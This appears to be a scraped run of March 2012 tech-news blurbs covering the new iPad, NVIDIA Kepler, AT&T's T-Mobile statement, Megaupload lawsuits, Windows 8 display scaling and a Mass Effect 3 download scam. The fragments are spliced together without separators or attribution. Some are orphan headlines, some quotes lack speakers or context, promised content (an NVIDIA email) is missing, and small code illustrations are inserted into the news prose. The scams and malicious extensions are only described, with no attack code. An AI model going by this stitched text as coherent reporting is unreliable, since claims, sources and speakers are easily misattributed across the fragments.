Steve rejecting a design five years ago isn’t a huge deal. Steve was well known for rejecting ideas, tweaking them, and turning them into something even better. And that’s a very good thing. One of my favorite parts of working at Apple was knowing that SJ said “no” to most everything initially, even if he later came to like it, advocate for it, and eventually proudly present it on stage. This helped the company stay focused and drove people to constantly improve, iterate, and turn the proverbial knob to 11 on everything.
What at first seemed like a relatively benign story about Internet protests over the ending of Mass Effect 3 became an enduring story this week, with Bioware publicly addressing the complaints very respectfully amid growing furor. Also this week, EA announced server shutdowns for over a dozen of its online games, including some that were released relatively recently.
We're starting to gear up for PAX East in Boston these days. Anyone got any recommendations for either the show or the surrounding cityscape?
RIM putting BlackBerry 10 test units in developers' hands in May
Pixel-pumping prowess: Ars reviews the third-generation iPad: Extra memory, faster chips, a huge new battery—the third-generation iPad needs them all to drive its high-resolution screen.
Apple to announce plans for $100 billion cash pile on Monday: Apple made a surprise announcement saying it would make public its plans for its nearly $100 billion cash hoard.
Last weekend saw the return of Weird Science, which barely snuck on to our list of the top stories. It faced fierce competition from a number of stories on energy—the cost of coal, efficient LEDs, the displacement of fossil fuels, and a new method of making solar panels. Our most detailed look yet at the planet Mercury also proved to be very popular.
Pirate Bay plans to build aerial server drones with $35 Linux computer: The Pirate Bay has announced plans to build a fleet of flying server drones using the Raspberry Pi ARM board. The airborne computers will reportedly be more difficult for law enforcement agencies to terminate.
Facebook says it may sue employers who demand job applicants' passwords: After an alarming increase in reports of employers demanding Facebook usernames and passwords, Facebook said it is willing to take legal action.
Chevrolet replacing 120-volt power cords on most Volt automobiles
White House cybersecurity adviser Howard Schmidt discusses the implications of bring-your-own-device policies, as well as how intelligence agencies and businesses could share more information
Epic Mickey 2 controllers invoke the power of the brush, are made for you and me
Huawei Fusion hits AT&T's GoPhone lineup, prepaid Gingerbread for $125 (update)
NVIDIA CEO suggests Kepler GPUs could be headed to future 'superphones'
Motorola Connected Home Gateway home automation all-in-one hits the FCC with Verizon tags
Permoveh personal vehicle prototype can travel sideways, diagonally (video)
US Army debuts app marketplace prototype: iOS first, Android coming soon
FCC Fridays: March 23, 2012
Xbox 360's Comcast Xfinity TV app in beta testing, won't count against data caps when it launches
Rdio inks deal to license UK music, but doesn't offer up a visit date
AT&T has issued an I-told-you-so press release addressing the T-Mobile layoffs announced Friday, asserting that they wouldn't have happened if the FCC had just let AT&T buy T-Mobile. Jim Cicconi, AT&T's senior executive vice president of external and legislative affairs, said in the statement that T-Mobile's recent misfortune demonstrates the need for more "regulatory humility," and that "the truth of who was right is sadly obvious." AT&T is referring, of course, to itself.
While AT&T was trying to acquire T-Mobile, the company asserted that the merger would create many jobs, a claim that the FCC and the US Department of Justice refused to believe. In fact, the FCC stated in its own report that the merger would create a "net loss of direct jobs."
T-Mobile stated Friday that it plans to close seven call centers and cut 1,900 jobs. In AT&T's press release, Cicconi said that the company planned specifically to protect "these very same small call centers and jobs if our merger was approved," and that the job loss has proven the FCC made the wrong choice.
Of course, the FCC's and DoJ's real concern was the reduction in competition that the merger would have created. Four billion dollars later, AT&T is apparently still smarting from the agencies' decision.
Editor's Update: Friday evening, a spokesperson for the FCC sent an e-mail to All Things D flatly denying claims made by AT&T's petulant press release, saying "The bottom line is that AT&T’s proposal to acquire a major competitor was unprecedented in scope and the company’s own confidential documents showed that the merger would have resulted in significant job losses." The spokesperson did not elaborate on the details of those confidential documents.
Apple updates iTunes Movie Trailers app, lets your Retina watch high-res teasers
Valcom, a company that makes automatic voice paging systems that function over analog and IP lines, is suing Megaupload.com for copyright damages, saying that a “significant number” of its more than 6,000 audio and video titles were distributed illegally through the file-sharing site. Valcom's clients include school, government, and transportation systems, which use the company's recordings in the event of emergencies or as background easy-listenin' music in brick-and-mortar waiting areas.
Megaupload was a popular cyberlocker seized by the Feds in January for criminal copyright infringement, money laundering, and racketeering.
The recording company stated in a press release that it had filed a suit against Megaupload, which had an associated shell company responsible for causing "an estimated half-billion dollars in copyright losses" altogether, noting that cases of willful copyright infringement can result in damages ranging from $750 to $150,000 per copyright infringed. Valcom's legal counsel will seek a slice of some of the millions of dollars seized by government authorities for each of the copyrights that Valcom can prove were infringed upon.
The Next Web suggests that Valcom could sue for as much as $900 million in damages if all 6,000 titles were infringed upon and if the company could make the case that each copyright merited a $150,000 remittance, but the actual number Valcom seeks will most likely be much lower than that, as Valcom only claims a portion of its copyright library was used illegally. Ars contacted Valcom but did not receive an immediate response.
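For a rough sense of where that ceiling comes from, here's a back-of-the-envelope calculation (my own illustration, not a figure from the filing):

```typescript
// Statutory damages for willful copyright infringement range from $750 to $150,000 per work.
const MIN_PER_WORK = 750;
const MAX_PER_WORK = 150_000;
const titles = 6_000; // best case assumed by The Next Web: Valcom's entire catalog infringed

const floor = titles * MIN_PER_WORK;   // $4,500,000
const ceiling = titles * MAX_PER_WORK; // $900,000,000

console.log(`If all ${titles} titles were infringed: $${floor.toLocaleString()} to $${ceiling.toLocaleString()}`);
```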
Valcom's claim may be only the first in a flurry of suits against Megaupload seeking recompense for alleged lost profits, and only the start for Valcom's new "aggressive initiative to acquire back-due royalties and compensation... for the benefit of the Company and to increase value for our shareholders," according to a statement made by Vince Vellardita, President and CEO of Valcom.
Listen to the Engadget Mobile Podcast at 5PM ET, with special guest Sascha Segan!
MOG opens its doors to Windows with new desktop application
Insert Coin: Galileo, the remote control camera from the men behind the Gorillapod
Where there is passion on the internet, there is someone who seeks to exploit it. Thus, in the wake of the massive fan-driven controversy surrounding the ending of Mass Effect 3, a new scam has been unearthed that seeks to trick users into clicking on affiliate advertising offers in exchange for a download of a supposed "new ending."
The spam email, as uncovered by GFI, directs users to download a ZIP file containing a password-protected downloader for the supposed new ending. A text file inside the ZIP instructs downloaders to go to a web site where they're asked to take part in one of a number of shady offers to get access to the supposed password.
"Last Mass Effect 3 Ending, was really bad, but here, you have NEW, EXCITING ENDING," reads the download page. "You only need, to downlad [sic], and run it, downloader will automacitally [sic] start, download, new ending files, you will like it!"
You'd think obvious misspellings like "automacitally" and the generally poor grammar would raise the warning bells for users even remotely familiar with internet security, but nevertheless the download link has attracted at least a few hundred gullible players since its first appearance, according to publicly displayed statistics.
Recently, Bioware told fans they would be working to address the rampant criticism of the Mass Effect trilogy's vague ending with new downloadable content that will help answer lingering questions. However, the official DLC will not be available until April, and will likely only be available on Xbox Live, the PlayStation Network, and Origin (EA's download service). Even then, it's unclear whether the new content will significantly change the game's existing ending or merely add new context and explanation to the existing narrative.
Earlier this week, legislators in Tennessee approved a bill that singles out public school science education for special attention. Now, the Oklahoma House has passed a very similar bill that attacks an identical range of subjects that the legislation deems controversial: biological evolution, the chemical origins of life, global warming, and human cloning.
Both bills contain identical language, saying they "shall not be construed to promote any religious or nonreligious doctrine." There's also identical language about how they're intended to "help students develop critical thinking skills they need in order to become intelligent, productive, and scientifically informed citizens." However, the subjects they target are not areas where there are significant scientific controversies; either the bills' sponsors are poorly informed (and thus shouldn't be injecting themselves into science education), or they have non-educational goals in mind.
In any case, the legislators want to do what they can to enable science teachers to teach the controversy. To that end, they're basically attempting to block any educational authority—school board, principal, the state board of education—from punishing a teacher for covering the "scientific strengths and scientific weaknesses of existing scientific theories." The Oklahoma bill goes a bit further, adding protections for students who choose to voice their disagreements with the science in any medium.
Given the staggering amount of scientific-sounding misinformation available on topics like evolution and climate change, these bills are a recipe for chaos in the science classrooms. It's a chaos that state legislators are inviting local school districts to sort out at great expense via lawsuits.
Engadget Podcast 286 - 03.23.2012
A control scheme for a game is like the foundation for a house. If it's constructed well, it serves its purpose largely in the background, providing unseen support for the part that people see. But if there's a problem with either a game's control scheme or a house's foundation, it can easily sink the rest of the enterprise, no matter how well it's constructed.
Such is the case with Kid Icarus: Uprising, an imaginative, lighthearted, fun-filled game that is ultimately sunk by some incredibly ill-conceived controls.
Sony VAIO VCC111 Chromebook passes through FCC, Chrome OS flies its flag
This waif of a tablet certainly took its sweet time getting here. We first laid eyes on this lightweight beauty last August and while it still hasn't landed in the US just yet (under the guise of the Excite 10 LE) we've brought in the international version -- already in stores in the UK -- to test out the hardware, which appears to be identical. On first appearances, it's an attractive sliver of a slab, due to the magnesium alloy body, of which there isn't much. Measuring in at just 7.7mm thick, we're talking RAZR-scale thinness and a 1.18 pound weigh-in that embarrasses 7-inch devices. Despite this, we still have a 1.2GHz dual-core OMAP processor, running Honeycomb 3.2 on a 10.1 inch touchscreen. But surely, sacrifices must have been made, right? Well, it looks like it's a financial cost that has to be paid. The 16GB version is currently on sale for £399, matching the new iPad in the UK, and likely to arrive in the US at around $530, pricing itself quite a bit above existing, similarly-specced, Android favorites like the Galaxy Tab 10.1. Are you willing to pay a fair chunk of change extra to skim a few millimeters off your tablet profile? Is it worth it? The full story is right after the break.
Toshiba AT200 review
Digital gaming soars nine percent, still knows nothing of rarity value
It was absurd, he added, that American classrooms were still based on teachers standing at a board and using textbooks. All books, learning materials, and assessments should be digital and interactive, tailored to each student and providing feedback in real time. Jobs wanted to hire great textbook writers to create digital versions, and make them a feature of the iPad. He wanted to make textbooks free and bundled with the iPad, and believed such a system would give states the opportunity to save money.
Since November 2011, according to recent statistics, Google Chrome has become the most popular browser in Brazil (more than 45% of the market share).
The same is true for Facebook, which is now the most popular social network in Brazil, with a total of 42 million users, displacing Orkut.
These two facts are enough to motivate Brazil’s bad guys to turn their attention to both platforms. This month we saw a huge wave of attacks targeting Brazilian users of Facebook, based on the distribution of malicious extensions. There are several themes used in these attacks, including “Change the color of your profile” and “Discover who visited your profile”, and some bordering on social engineering, such as “Learn how to remove the virus from your Facebook profile”:
1) Click on Install app, 2) Click on Allow or Continue, 3) Click on Install now, After doing these steps, close the browser and open again
This last one caught our attention not because it asks the user to install a malicious extension, but because the malicious extension is hosted in the official Google Chrome Web Store. If the user clicks on “Install aplicativo”, he will be redirected to the official store. The malicious extension presents itself as “Adobe Flash Player”:
Facebook is trying to expand its trademark rights over the word "book" by adding the claim to a newly revised version of its "Statement of Rights and Responsibilities," the agreement all users implicitly consent to by using or accessing Facebook.
You may recall that Facebook has launched multiple lawsuits against websites incorporating the word "book" into their names. Facebook, as far as we can tell, doesn't have a registered trademark on "book." But trademark rights can be asserted based on use of a term, even if the trademark isn't registered, and adding the claim to Facebook's user agreement could boost the company's standing in future lawsuits filed against sites that use the word.
So to sum up, iPhone 5,1 is on track for:
- Similar if not same sized screen (currently 3.5-inch but not set in stone)
- 4G LTE radio
- New “micro dock” connector
- Fall/October 2012 release
iMore had previously reported that it believes the new iPhone will carry a miniaturized dock connector to help reduce the overall size of the iPhone itself.
The Xperia S is a large and somewhat ungainly smartphone with a superb screen and some high-end features. However, it's severely let down by its lack of storage expansion and sealed-in battery.
(ZDNet UK - Smartphones)
Nokia has updated its core navigation apps for its Lumia handsets, bringing new features such as full offline voice-guided navigation, public transport directions and speed limit warnings
(ZDNet UK - Mobile Apps)
A source with access to the latest Mountain Lion preview alerted Ars that double-sized graphics have popped up in some unexpected places, once again suggesting that Apple may be close to releasing MacBooks with high pixel-density screens. We'd previously spotted these same Retina-sized graphics in the Lion beta of Apple's new Messages application.
Virgin Media Business, BT and KCom are among the dozen companies that successfully bid to become suppliers of managed telecoms for the public sector's network of networks
The stock crashed 9% to $542.80 before trading was stopped. When the stock started trading again, it opened at $598.39. Trading has since resumed, but there has been no clarification on what happened. StreetInsider speculates that it was "an apparent errant trade".
A single trade for 100 shares executed on a Bats venue briefly sent Apple, the world’s most valuable company, down to $542.80, triggering a circuit breaker that paused the shares. The order was executed at 10:57 a.m. New York time. Two more transactions, which sent the stock back above $598, were made before the halt. The stock stayed around that level once trading resumed.
Edges out UNIX
"I've made thousands of sketches and hundreds of prototype products (for the Galaxy). Does that mean I was putting on a mock show for so long, pretending to be designing?"Lee admits that he may not be at the level of Apple's VP for design Jonathan Ive, but believes Samsung "will produce such iconic products one day."
"As a designer, there's an issue of dignity. (The Galaxy) is original from the beginning, and I'm the one who made it. It's a totally different product with a different design language and different technology infused."
“Apple Stores and the Apple Web site are tremendously productive, but they are limited by their relatively small retail footprint,” CIRP’s Josh Lowitz told AllThingsD. “There are four times as many Best Buy stores, and probably 20 times as many AT&T, Verizon, and Sprint stores, so aggressive distribution through all these channels is critical to Apple’s U.S. strategy.”
The iPad port will include all the improvements and additions found in the PC version, including full integration of the Tales of the Sword Coast expansion pack. The title is also running on the refined Baldur's Gate II Infinity Engine, allowing gamers to experience the original adventure with the sequel's refined graphics options and other engine tweaks. IGN reports that the new version of the game will feature new content, more quests, and a new party member. The early build of the iPad version runs smoothly, though the interface has not yet been revamped to be more touch-friendly. Those changes are still in the works, though pinch and zoom has already been implemented. The iPad version is expected to launch this summer.
Government services will be online by default in the future, and must be easy enough for the minister responsible to use, under new measures announced in the 2012 UK Budget
If manufacturers follow suit, Windows 8 tablets and hybrids will sport displays that rival, or exceed, the Retina Display on Apple's new iPad, Microsoft has said
(ZDNet UK - Desktop OS)
In this article, I explore how OpenBSD's clean code and sane defaults recently saved the day. For great science! It's no secret that OpenBSD is an excellent research platform. From packages(7) for specialised software to out-of-the-box httpd(8), sshd(8), and so on, it's a no-brainer to pop OpenBSD onto a workstation and just get to work.
The road to any new microprocessor design is by no means simple. Planning for a major GPU like NVIDIA's Kepler starts four years prior to the chip's debut. In a world that's increasingly more focused on fast production and consumption of everything, it's insane to think of any project taking such a long period of time.
Chip planning involves figuring out what you want to do, what features you want, what the architecture should look like at a high level, etc... After several rounds of back and forth in the planning stage, actual architecture work begins. This phase can take a good 1 - 1.5 years depending on the complexity of the design. Add another year for layout and validation work, then a 6 - 9 month race from tape out to products on shelves. The teams that spend years on these designs are made up of hard working, very smart people. They all tend to believe in what they're doing and they all show up trying to do the best job possible.
Unfortunately, picking a target that's 4 years out and trying to hit it better than your competition is extremely difficult. You can put in an amazing amount of work, push through late nights, struggle with issues, be proud of what you've done and still fall short. We've seen this happen to companies on both sides of the fence, whether we're talking CPUs or GPUs, you win some and you lose some.
Today NVIDIA unveiled Kepler, a more efficient 28nm derivative of its Fermi architecture. The GeForce GTX 680 is the first productized Kepler for the desktop and if you read our review, it did very well. As our own Ryan Smith wrote in his conclusion to the GeForce GTX 680 review:
"But in the meantime, in the here and now, this is by far the easiest recommendation we’ve been able to make for an NVIDIA flagship video card. NVIDIA’s drive for efficiency has paid off handsomely, and as a result they have once again captured the performance crown."
We've all heard stories about what happens inside a company when a chip doesn't do well. Today we have an example of what happens after years of work really pay off. A trusted source within NVIDIA forwarded us a copy of Jen-Hsun's (NVIDIA's CEO) email to all employees, congratulating them on Kepler's launch. With NVIDIA in (presumably) good spirits today, I'm sure they won't mind if we share it here.
If you ever wondered what it's like to be on the receiving end of a happy Jen-Hsun email, here's your chance:
Starting March 23 the new iPad will be available in Austria, Belgium, Bulgaria, Czech Republic, Denmark, Finland, Greece, Hungary, Iceland, Ireland, Italy, Liechtenstein, Luxembourg, Macau, Mexico, The Netherlands, New Zealand, Norway, Poland, Portugal, Romania, Slovakia, Slovenia, Spain and Sweden. The 3rd Generation iPad launched in 10 countries including the U.S. last Friday and is now expanding further internationally. The iPad is available for online order with 1-2 week delivery delays.
The weakness is caused by an error in the handling of URLs when using JavaScript's window.open() method. It can be exploited to trick users into supplying sensitive information to a malicious web site, because the information displayed in the address bar can be constructed in a way that leads users to believe they're visiting a different web site from the one actually being displayed.
Last month, a developer of applications ("apps") for Apple's mobile devices discovered that the social networking app Path was accessing and collecting the contents of his iPhone address book without having asked for his consent. Following the reports about Path, developers and members of the press ran their own small-scale tests of the code for other popular apps for Apple's mobile devices to determine which were accessing address book information. Around this time, three other apps released new versions to include a prompt asking for users' consent before accessing the address book. In addition, concerns were subsequently raised about the manner in which apps can access photographs on Apple's mobile devices. The developers are given until April 12, 2012 to respond.
We are writing to you because we want to better understand the information collection and use policies and practices of apps for Apple's mobile devices with a social element. We request that you respond to the following questions:
(1) Through the end of February 2012, how many times was your iOS app downloaded from Apple's App Store?
(2) Did you have a privacy policy in place for your iOS app at the end of February 2012? If so, please tell us when your iOS app was first made available in Apple's App Store and when you first had a privacy policy in place. In addition, please describe how that policy is made available to your app users and please provide a copy of the most recent policy.
(3) Has your iOS app at any time transmitted information from or about a user's address book? If so, which fields? Also, please describe all measures taken to protect or secure that information during transmission and the periods of time during which those measures were in effect.
(4) Have you at any time stored information from or about a user's address book? If so, which field? Also, please describe all measures taken to protect or secure that information during storage and the periods of time during which those measures were in effect.
(5) At any time, has your iOS app transmitted or have you stored any other information from or about a user's device - including, but not limited to, the user's phone number, email account information, calendar, photo gallery, WiFi connection log, the Unique Device Identifier (UDID), a Media Access Control (MAC) address, or any other identifier unique to a specific device?
(6) To the extent you store any address book information or any of the information in question 5, please describe all purposes for which you store or use that information, the length of time for which you keep it, and your policies regarding sharing of that information.
(7) To the extent you transmit or store any address book information or any of the information in question 5, please describe all notices delivered to users on the mobile device screen about your collection and use practices both prior to and after February 8, 2012.
(8) The iOS Developer Program License Agreement detailing the obligations and responsibilities of app developers reportedly states that a developer and its applications "may not collect user or device data without prior user consent, and then only to provide a service or function that is directly relevant to the use of the Application, or to serve advertising.";
(a) Please describe all data available from Apple mobile devices that you understand to be user data requiring prior consent from the user to be collected.
(b) Please describe all data available from Apple mobile devices that you understand to be device data requiring prior consent from the user to be collected.
(c) Please describe all services or functions for which user or device data is directly relevant to the use of your application.
(9) Please list all industry self-regulatory organizations to which you belong.
"We will be launching our music service on iOS in the next few weeks," said Layden, who was speaking at the IP&TV World Forum with TechRadar in attendance.Music Unlimited is Sony's on-demand all you can listen to music service that costs $9.99 a month. Sony claims to have a global catalog of over 10 million songs that you can listen to on your computer, Android phone, Sony Enabled device, and soon, iOS device. They offer unlimited skips and no ads for the paid service.
"We want to be on as many devices for users who want to be part of Music Unlimited."
MIT researchers have developed a camera system that uses reflected laser light to 'see' and build 3D images of objects that are out of line-of-sight
In an email exchange with iLounge, DisplayMate President Ray Soneira indicated that the third-generation iPad—when connected to power via the included Apple 10W Power Adapter—actually continued to draw 10W of power for up to one hour after reaching what is reported by iOS as a full 100% charge. In its battery testing of the new iPad, iLounge found that the charge would sometimes drop quickly at first, right when the iPad appeared to be fully charged.
The country is making headway on a pilot scheme to move public-sector bodies from proprietary to free and open-source software, though Oracle and other products could create hurdles
RIM, based in Waterloo, Ontario, shipped 2.08 million BlackBerrys last year in Canada, compared with 2.85 million units for Apple, data compiled by IDC and Bloomberg show. In 2010, the BlackBerry topped the iPhone by half a million, and in 2008, the year after the iPhone’s debut, RIM outsold Apple by almost five to one. RIM has been in decline since the launch of the iPhone and Android platforms, with sales and profits dropping. RIM's worldwide numbers have been falling precipitously, in contrast to significant growth from iOS and Android.
Microsoft's David Washington has penned another informational tome on the Building Windows 8 blog, this one about Windows 8 and its support for varying screen resolutions. The above chart lists the common (but not the only) resolutions that Microsoft is planning for, and while most of the listed display types won't surprise anyone (wall-to-wall 1366x768 and 1920x1080 for most desktops and laptops), it does appear as though Microsoft is planning for Windows tablets with a DPI that approaches or matches that of the new iPad.
Microsoft is planning for tablets that use both the 1024x768 and 1366x768 resolutions common in earlier and lower-end tablets as well as the high-DPI screens that are being (and will be) ushered in by the new iPad. To scale Windows elements so that they're still comfortable to look at and touch at these resolutions, Microsoft has put together some pre-defined scaling percentages: 100% when no scaling is applied, 140% for 1080p tablets, and 180% for quad-XGA tablets like the new iPad. These percentages were all chosen as "pixel density sweet spots" for 10" and 11" tablets with 1920x1080 or 2560x1440 displays. It should be noted that Washington's blog post focused entirely on Metro scaling - whether the Windows desktop will automatically scale using these percentages is unclear.
Microsoft's attention to these specific resolutions suggests that we will probably see some high-DPI Windows tablets when they launch in the fall, though we still don't know anything about the tablets OEMs are designing for Windows 8 and Windows on ARM. It's also telling that there are no 7" tablets on that chart - we may not see Windows versions of smaller tablets like the Kindle Fire or Nook Tablet.
Washington went on to explain the reasoning behind the minimum resolution requirements for Metro apps that we noticed in our Windows 8 preview review - 1024x768 for Metro apps and 1366x768 for the Metro Snap feature. Both choices were largely developer and data-driven: 1024x768 is a common low-end resolution for web developers and tablet app developers, and Microsoft didn't want to restrict these developers to a lower minimum resolution to account for the small percentage of 800x600 and 1024x600 displays that are currently in use.
As for snapped apps: the size for a "snapped" app is always 320 pixels wide, which was again selected because developers have become used to it in their work with smartphones. A 1366x768 display is the lowest common screen resolution that allows for the 320 pixel width and the 1024 pixel minimum width for regular Metro apps.
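To make the arithmetic concrete, here is a rough sketch (my own illustration, not Microsoft's code) of the scale plateaus and the snap-view math described above:

```typescript
// Sketch of the Metro scaling plateaus and snap-view arithmetic from the Building Windows 8 post.
// The percentages, resolutions, and pixel widths come from that post; the lookup and the check
// below are a simplified illustration, not Microsoft's actual selection logic.

// Scale plateaus quoted for ~10-11" tablet panels.
const scaleForTabletResolution: Record<string, number> = {
  "1366x768": 100,  // no scaling applied
  "1920x1080": 140, // 1080p tablets
  "2560x1440": 180, // high-DPI tablets in the same density class as the new iPad
};

// Snap view reserves a fixed 320px column; regular Metro apps need at least 1024px.
const SNAP_WIDTH = 320;
const METRO_MIN_WIDTH = 1024;

function supportsSnap(horizontalPixels: number): boolean {
  // 320 + 1024 = 1344, so 1366x768 is the lowest common resolution that fits both side by side.
  return horizontalPixels >= SNAP_WIDTH + METRO_MIN_WIDTH;
}

console.log(scaleForTabletResolution["2560x1440"]); // 180
console.log(supportsSnap(1366)); // true
console.log(supportsSnap(1024)); // false: Metro apps still run, but snap is unavailable
```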
Also discussed were the methods by which Metro allows programs to expand to take up all of the pixels in a larger laptop or desktop display: To help dynamically expand content to take up more screen space when the pixels are available, Windows 8 uses the same XAML and CSS3 features that are commonly used to accomplish this on modern web pages - examples of such features include the grid, flexible box, and multi-column CSS3 layouts. App templates provided with Visual Studio 11 all make use of these features automatically. Developers can also scale their apps to fit larger displays, which is useful for games or other apps that don't need to make use of additional pixels.
For more, including Windows 8's support for scalable graphics and the Windows Simulator tool that will provide Visual Studio 11 users the ability to test their apps at multiple screen resolutions, the full post is linked below for your convenience.
Source: Building Windows 8 blog
The method may begin by obtaining an input that may be used to identify the electronic device that is to be controlled, such as by using image processing techniques to compare the captured image against a database of known devices. Apple acknowledges the iPhone in question would also need IR transmission capabilities. The patent application dates from 2010.
Mistake in the release matrix
“How do you follow up on Fermi?” That’s the question we had going into NVIDIA’s press briefing for the GeForce GTX 680 and the Kepler architecture earlier this month. With Fermi, NVIDIA not only captured the performance crown for gaming, but they managed to further build on their success in the professional markets with Tesla and Quadro. Though it was very clearly a rough start for NVIDIA, Fermi ended up doing quite well in the end.
So how do you follow up on Fermi? As it turns out, you follow it up with something that is in many ways more of the same. With a focus on efficiency, NVIDIA has stripped Fermi down to the core and then built it back up again; reducing power consumption and die size alike, all while maintaining most of the aspects we’ve come to know with Fermi. The end result of which is NVIDIA’s next generation GPU architecture: Kepler.
Launching today is the GeForce GTX 680, at the heart of which is NVIDIA’s new GK104 GPU, based on their equally new Kepler architecture. As we’ll see, not only has NVIDIA retaken the performance crown with the GeForce GTX 680, but they have done so in a manner truly befitting of their drive for efficiency.
While the desktop-bound GeForce GTX 680 is undoubtedly the most exciting release from NVIDIA today and the true flagbearer for their new Kepler microarchitecture, NVIDIA actually has a whole host of releases ready to go on the notebook front. We've already had a chance to check out the GeForce GT 640M in action, but it's far from the only member of the old/new GeForce 600M series. Today we have details on their complete 600M series from top to bottom; some of it is exciting and new, and some of it is just the GPU industry up to its same old marketing tricks. Read on for the full details.
Ice Cream Sandwich is on the way
Asus's Transformer Prime just got some company. Available for pre-order today, the Acer Iconia Tab A510 brings the price of entry for a 10.1" Tegra 3-powered tablet down to a cool $449.99, $50 less than the similarly equipped Asus offering. Like the Prime, the A510 features a 10.1" 1280x800 display and the 1.3 GHz Tegra 3 SoC with 1 GB of RAM and 32 GB of storage expandable by microSD. The battery in the A510 is an impressive 36.26 Whr, not quite as large as the new iPad's, but somewhat bigger than its predecessor's and the Prime's. That big battery does lead to a somewhat portly frame, with a thickness cresting a centimeter and a weight nearly 100g more than the Prime. The frame is similar to the A200 we saw in January, but is actually a little thinner and with a textured back for extra grip.
Android 4.0 is on board for software, complete with Acer's Ring UI, a relatively innocuous skin that mainly seeks to put your most commonly used apps in easy reach. When we took a look at the A500, we were pleased with its display quality, not quite IPS but great for a vanilla LCD; we hope we can expect more of the same from this display. Software pre-load includes the usual branded media players and print software, along with Polaris Office 3.5 for productivity. Gone, though, is the full-sized USB port, replaced by microUSB, though it remains compatible with portable HDDs up to 2TB in size.
There's no shortage of options for tablet buyers right now, and every day another pops up. But if performance, battery life, and price are your main criteria, the A510 may just be the tablet for you. Pre-orders start today for $449.99 at your favorite e-tailers; no ship dates are available.
The agency, dedicated to running large EU-wide IT systems, has officially begun work in Estonia, and will initially focus on databases related to visas and fingerprints, with other systems likely to follow
(ZDNet UK - Regulation)
The HTC Eternity is the first Windows Phone to be sold in China, and comes with a version of the operating system tailored to Chinese characters
Apple is lining up extra votes in the European Telecommunications Standards Institute, reports say, as it seeks to get backing for its new nano-SIM standard
While more than 80 percent of the data breaches in 2011 were due to organised criminal activity, the number of records pilfered by activist groups represented 58 percent of the total, a new report has found
We've known about Cedar Trail, the next iteration of Intel's Atom processor line, for quite a while now. As far as the CPU is concerned, not a lot has changed from the previous generation Pine Trail. Cedar Trail is manufactured on Intel's 32nm process technology, but the CPU architecture is still in-order. You can read more of our Cedar Trail coverage in our initial look at the platform. It's taken far longer than expected, but we finally got someone to send us a Cedar Trail netbook for review. That someone is ASUS, and the netbook is their 1025C.
We'll have our full review in the future, but in the meantime we thought we'd give some quick impressions of performance and, more importantly, battery life during video playback. I'll cut straight to the chase with regards to CPU performance: it's largely unchanged from the last version, which means Atom N2600 still feels quite sluggish for many tasks. Atom is faster than ARM A9 CPUs, and you can see a comparison of Sunspider 0.9.1 with various tablets below, but for Windows 7 it's still painfully slow at times.
The bigger change however is in the GPU, where the old GMA 3150 (itself a minor tweak to the even older GMA 950) is finally getting a needed upgrade. This won't turn Atom into a gaming system by any stretch of the imagination, but it does finally bring GPU accelerated H.264 decoding into the Atom ecosystem (without the need for a discrete GPU). What does that mean for performance? It means HD YouTube video can finally run without dropping a ton of frames—at least, the 720p videos that I tested played back without any major issues. 1080p video still experiences quite a few dropped frames, unfortunately, but then you don't need to stream 1080p video if you're using the integrated 600p LCD.
But YouTube HD video has always demanded more than local video playback, and we can now finally get DXVA assisted playback of H.264 video content. I tested both 720p and 1080p H.264 videos without any major issues using MPC-HC. What's more, I ran our standard H.264 battery life test to see how the Atom N2800 fared—and I ran it a second time with a 1080p video stream just for good measure. Check out the results:
Atom and netbooks in general still aren't going to set the world on fire with performance, but if there's one thing Atom can do well it's long battery life. Cedar Trail takes the previous Atom results and improves on them by over 50% in video playback tests. Tablets still generally do better here, but given that Cedar Trail now supports HDMI output, you could conceivably use an Atom netbook as a portable media player in addition to standard laptop tasks.
I tested Hulu and Netflix on the 1025C as well and both worked reasonably well, but only with SD content. That's not an issue for Hulu, but Netflix HD content completely lost A/V sync. It may be that Hulu and Netflix are not currently recognizing the GMA 3600, but until this is addressed it's worth noting.
There's still a question of whether a $300 netbook has a place in the market when we've got tablets to play with, but it's really a matter of intended use as well as price. ASUS' own Eee Pad Transformer Prime offers a better display and a nifty touch interface that easily surpasses the Windows 7 Starter experience, but if you're looking to do mundane tasks like basic word processing you'll need the keyboard attachment, which takes the final price up to ~$550—nearly twice that of the Eee PC 1025C. For basic typing, then, the price of the 1025C makes it a better choice, and you get excellent battery life that will easily carry you through a day of use and then some.
Atom still isn't going to surpass AMD's Brazos for performance or GPU driver quality, but pricing and battery life still appear to be in favor of Intel's Atom, and 10.1" Brazos netbooks are pretty rare. We'll have our full review as soon as we can finish running the remaining benchmarks and doing additional testing, which might be a while. Hopefully we'll see equally impressive improvements for Internet and Idle battery life, but it took over ten hours to recharge the battery on the 1025C and eight hours plus for our video playback test, so basically I'm looking at a full day for each battery test cycle to complete.
Adobe has released the beta of the CS6 version of Photoshop, the industry standard image editing application. We've been looking at some of its many new features.
Today we are looking at the Gigabyte GA-A55M-S2V, the first A55 motherboard to hit the AnandTech test beds. In comparison to the A75 platform, which we have covered extensively, the A55 chipset lacks a few features such as USB 3.0, SATA 6 Gbps and a second full-length PCIe slot; A55 motherboards are usually aimed at low-end, low-budget system builders. The Gigabyte GA-A55M-S2V comes in at a smaller-than-mATX form factor for just such occasions. Please read on for the full review.
The iPad (3) took front row during the recent launch extravaganza; however, Apple also refreshed their Apple TV with a new model sporting a single-core A5 SoC and some other noteworthy tweaks. We've spent some time with the new model since its launch, and have found a few interesting new things lurking inside. In addition to decoding 1080p iTunes content and Netflix streams, the new Apple TV also includes a second WiFi antenna with better gain, which translates to improved reception and network throughput.
Read on for our quick review.
DRM (Digital Rights Management) is intended to protect media from being played in an unauthorized manner. However, more often than not, it fails to serve the purpose. Today, we will take a detailed look at Cinavia, a DRM mechanism which has recently become mandatory for all Blu-ray players to support.
We will see how Cinavia is different from other Blu-ray DRM mechanisms, and find out whether it will actually help in reducing media piracy. In almost all cases, it is the law-abiding consumer who is put to much inconvenience. Will Cinavia be doing the same? While we are on the subject of Blu-rays, we will also try to identify areas where user-friendliness can be improved and how consumers can get the best possible experience from them. Read on for our opinion piece.
Since I had to announce that Canonical was dropping support for Kubuntu from 12.11 (and then had to announce two days later they were dropping support for 12.04) I've been getting lots of people asking "is this the end of KDE?"
Of course it isn't; KDE is a vibrant community of people making useful and fun software.
Recently Gnome have been noticing they're not winning either. There is a growing realisation that Canonical dropped Gnome some years ago. [This is melodramatic overstatement; there are still a bunch of Gnome programmes used in Ubuntu Desktop, but the workspace, web browser and e-mail client aren't. Canonical is also using more Qt and less GTK.] Articles like GNOME 3: Why It Failed don't really help the impression.
